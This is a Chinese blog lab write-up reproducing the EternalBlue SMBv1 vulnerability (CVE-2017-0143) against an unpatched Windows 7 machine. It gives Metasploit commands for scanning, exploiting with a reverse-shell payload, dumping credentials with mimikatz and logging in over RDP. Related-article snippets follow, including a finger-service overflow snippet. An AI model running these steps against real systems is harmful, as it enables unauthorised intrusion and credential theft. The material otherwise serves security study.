CVE-2017-0143(远程溢出)漏洞复现

最新推荐文章于 2025-06-16 00:01:59 发布
最新推荐文章于 2025-06-16 00:01:59 发布
阅读量7.1k 收藏 13
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 随笔 文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Ch_an_ger/article/details/106864685
本文详细解析MS17-010漏洞原理,涉及Windows SMBv1内核态函数处理FEA转换时的缓冲区溢出问题。涵盖受影响的Windows版本,演示了如何在未打补丁的Win7环境下利用Metasploit进行攻击,获取system权限,以及通过mimikatz提取hash值和用户密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞原理
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。
函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
二、影响版本
Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
三、漏洞利用
在现在来说永恒之蓝漏洞算是有点老的漏洞了,Metasploit上已经有集成payload了,但是其危害确实是很大的,因为只要用它打进去似乎直接就是system权限,所以还是拿出来复现了一下。这里我搭的环境是win7,之前用过winxp做环境,结果也是一样的(直接system)。本来这次是打算用win8作为实验环境的,但是在最后用payload去exploit的时候一直回显超时(但是攻击机是ping得通win8机子的,并且扫描模块也显示搭的win8有cve-2017-0143漏洞),所以就换成了win7。不管是用哪种操作系统做环境,前提都要是没打cve-2017-0143漏洞的补丁的,不然怎么样都是白搞。
1.环境
攻击机:kali(192.168.123.31)
目标机:win7(192.168.123.79)
2.漏洞利用
端口扫描查看目标机开455端口没,没开就不用考虑下一步了nmap -sS 192.168.123.79

在这里插入图片描述
然后就是直接启用msf,去查cve-2017-0143的集成模块search cve-2017-0143
在这里插入图片描述
然后先用扫描模块扫描一下目标机的永恒之蓝漏洞能不能用
use auxiliary/scanner/smb/smb_ms17_010在这里插入图片描述该设置什么参数就都设置上
在这里插入图片描述
是能看到目标机上的永恒之蓝漏洞是可以利用的,接下来就是使用攻击模块了

 use  exploit/windows/smb/ms17_010_eternalblue

同时选择载荷(shellcode),我用的是回连至客户端(shell)的payload

set payload  windows/x64/meterpreter/reverse_tcp

然后就是该配置啥参数就配置啥参数
在这里插入图片描述
这里我用的本地监听端口是8888,默认是4444,然后直接run就行了
在这里插入图片描述
这里能看到进来直接就是system权限。
3.如果目标机还开了3389端口的话,还可以尝试去获取用户登录密码。
先用hashdump获取hash值。
mimikatz是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等,meterpreter中正集成了这款工具。
执行load mimikatz即可加载该工具,然后运行命令msv,导出hash
在这里插入图片描述
然后执行kerberos就能拿到用户登录密码了
在这里插入图片描述
拿到用户登录的账户密码就可以尝试远程连接了,如果连接请求被拦截了,可以尝试将端口转发到攻击机的本地端口进行连接

rdesktop  127.0.0.1 -u 用户名  -p 密码

然后就能弹回目标机的桌面了。

漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
李火火的安全圈
03-07 9176
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
CVE-2017-7529 Nginx整数溢出漏洞自动化验证脚本
afei001
04-23 4090
欢迎关注公众号:网络运维渗透,一起学习交流。 目录 1.漏洞简述 2.POCsuite POC脚本 3.漏洞修复 1.漏洞简述 当使用Nginx标准模块时,攻击者可以通过发送包含恶意构造range域的header请求,来获取响应中的缓存文件头部信息。在某些配置中,缓存文件头可能包含后端服务器的IP地址或其它敏感信息,从而导致信息泄露。 CVECVE -CVE-2017-7529 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别...
MS17-010/CVE-2017-0143永恒之蓝 漏洞复现
weixin_62689079的博客
11-30 2769
MS17-010/CVE-2017-0143永恒之蓝 漏洞复现漏洞利用
漏洞复现CVE-2015-1635、CVE-2017-0144
最新发布
2301_77091612的博客
06-16 744
漏洞分析】CVE-2015-1635(HTTP.sys)和CVE-2017-0144(永恒之蓝)是影响Windows系统的两个高危漏洞。HTTP.sys漏洞可通过特制HTTP请求导致系统崩溃或RCE,影响Win2008R2等系统;MS17-010则通过SMBv1协议实现远程代码执行。实验环境搭建未打补丁的Win2008R2+IIS服务,使用Kali进行渗透测试,成功验证漏洞存在性并通过Metasploit获取系统权限,最终利用PCShare木马实现持久化控制。关键步骤包括漏洞验证、内存读取、DoS攻击、s
永恒之蓝_CVE-2017-0143_漏洞复现/验证
1,2,3
03-06 1975
永恒之蓝CVE-2017-0143漏洞验证/复现
CVE-2017-0143
龙卷风摧毁停车场
03-13 976
漏洞出现在 Windows SMB v1 的内核态函数 srv!SrvOs2FeaListToNt 处理 FEA(File Extended Attributes) 转换时,在 Large Non-Paged Kernel Pool 上存在缓冲区溢出函数 srv!SrvOs2FeaListToNt 将 FEA list 转换成 NTFEA(Windows NT FEA) list 前调用 srv!
CVE-2017-0143永恒之蓝复现
Welcome To Myon'Blog !
12-22 679
CVE-2017-0143永恒之蓝复现 漏洞复现 永恒之蓝 win7漏洞 kali渗透
linux远程溢出漏洞,OpenAFS远程缓冲区溢出漏洞(CVE-2013-1794)
weixin_35728411的博客
05-10 301
发布日期:2013-03-04更新日期:2013-03-06受影响系统:OpenAFS OpenAFS 1.5.0-1.5.74OpenAFS OpenAFS 1.2.8 - 1.4.12.1描述:--------------------------------------------------------------------------------BUGTRAQ ID: 58299CVE...
Nginx整数溢出漏洞复现 CVE-2017-7529
m0_62284238的博客
09-09 1665
而我们构造http请求包头部中的range字段,选择start和end值让Nginx返回给我们指定位置的文件数据。如我们设置start和end为负值,则会返回Http响应包体的负数位置的文件数据给我们,也就是文件头和Http响应包头,这样我们就可以得到一些敏感信息如服务器的真实ip等。Nginx在进行反向代理时,会将一些静态文件进行缓存,缓存文件包括“文件头”+“Http响应包头”+“Http响应包体”,当再次请求这些文件时,Nginx会直接将缓存文件的Http响应包体返回给我们。访问靶机的8080端口。
复现CVE-2017-7269(IIS6.0远程代码执行)漏洞
记录并分享学习安全的知识点..
03-03 2098
前言: 今天小编挖到了一个高危漏洞,打进去以后,给的用户权限太低了,尝试了好久的提权。虽然最后没提权成功,起码也攻进去了,也是可看见系统盘所有目录下所有的关键资料,整理报告完成了也索性就记录一下趴! 警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞介绍 Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If: <http://”开头的长header PRO
IIS6.0漏洞CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 4116
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
远程溢出漏洞利用程序
06-08
远程溢出工具非常好用的!应该会与很多人用到的。360会查。使用请关了360.
远程缓冲区溢出漏洞利用程序
08-03
怎样写远程缓冲区溢出漏洞利用程序 ? 在此,我们假设有一个有漏洞的服务器程序(vulnerable.c). 然后写一个 exploit 来利用该漏洞,这样将能得到一个远程 shell。
linux远程溢出,Linux Systemd 又被曝高危远程溢出漏洞
weixin_33309848的博客
05-06 178
近日,开发者 ChrisCoulson 发现,在许多 Linux 版本中的 systemd 初始化系统有一个高危远程溢出漏洞(漏洞编号为 CVE-2017-9445),攻击者可以通过返回包含有特制 TCP 攻击负载的响应就能触发该漏洞,进而导致可在 Linux 系统上执行任意代码。systemd 是 Linux 下的 init 软件,主要用于减少系统引导时间和计算开销。而从 2015 年 6 月...
MS17-010远程溢出CVE-2017-0143
p_utao的博客
09-03 2370
漏洞介绍 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大
Windows Server服务 RPC 缓冲区远程溢出漏洞ms08-067复现
qq_63539335的博客
06-27 1076
渗透练习:Windows Server服务 RPC 缓冲区远程溢出漏洞(ms08-067)复现,nmap,msf模块利用
永恒之蓝 MS17-010 远程溢出漏洞复现
weixin_66146598的博客
06-07 1199
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。......
网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)
末班车的博客
03-10 923
MS08-067远程代码执行漏洞详细利用过程与发现思路
网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
末班车的博客
03-10 1483
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出
CVE-1999-0519复现
03-19
<think>好的,我需要帮助用户复现CVE-1999-0519漏洞。首先,我需要确认这个漏洞的具体信息,因为CVE-1999-0519的记录可能比较老旧,资料可能有限。 首先,查阅现有的引用资料。用户提供的三个引用分别是关于Shiro、Tomcat和Apache HTTP Server的漏洞,但CVE-1999-0519不在其中。这说明用户可能需要更广泛的信息。 接下来,我应该搜索CVE-1999-0519的详细信息。根据记忆,这个漏洞通常与Finger服务有关,属于缓冲区溢出或信息泄露类型。Finger服务在早期UNIX系统中常见,用于查询用户信息,但由于其设计不安全,容易导致信息泄露或攻击。 确认漏洞类型后,复现环境需要包含运行Finger服务的旧系统,如Solaris 2.6或更早版本,或者某些Linux发行版的老版本。用户可能需要使用虚拟机安装这些旧系统,并启用Finger服务。 复现步骤可能包括:安装配置Finger服务,利用漏洞获取敏感信息或执行缓冲区溢出攻击。例如,使用finger命令查询用户信息,或者发送超长请求触发溢出。 同时,需要提醒用户注意法律风险,仅在授权环境下测试,并强调该漏洞年代久远,现代系统可能已修复,因此复现需特定环境。 最后,生成相关问题,帮助用户深入理解此类漏洞,例如其他信息泄露漏洞、Finger服务的安全问题,以及如何防护老旧服务漏洞。</think>根据现有信息分析,CVE-1999-0519是一个与Finger服务相关的信息泄露漏洞。由于该漏洞年代久远(1999年),以下是复现建议: ### 漏洞背景 Finger协议(RFC 1288)用于查询系统用户信息,CVE-1999-0519的漏洞表现包括: 1. 远程攻击者通过finger服务获取敏感用户信息 2. 某些实现存在缓冲区溢出风险[^1] ### 复现步骤 #### 环境搭建 1. 使用旧版操作系统(如Solaris 2.6或Linux发行版Red Hat 5.x) 2. 启用finger服务: ```bash # 安装finger守护进程 sudo apt-get install fingerd # 启动服务(旧系统可能默认启用) service finger start ``` #### 攻击验证 1. 基础信息泄露测试: ```bash finger @victim_host # 列出所有登录用户 finger username@victim_host # 获取特定用户详细信息 ``` 2. 缓冲区溢出测试(需具体实现版本): ```python # 构造超长请求(示例) import socket payload = "A" * 2000 # 长度需根据目标系统调整 s = socket.socket() s.connect(("victim_ip", 79)) s.send(payload.encode()) ``` ### 防护建议 $$ \text{风险系数} = \frac{\text{攻击复杂度}}{\text{修复成本}} \times \text{影响范围} $$ 现代系统已默认关闭finger服务,建议: 1. 禁用finger服务:`chkconfig finger off` 2. 使用防火墙阻止79端口 3. 升级到无漏洞版本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值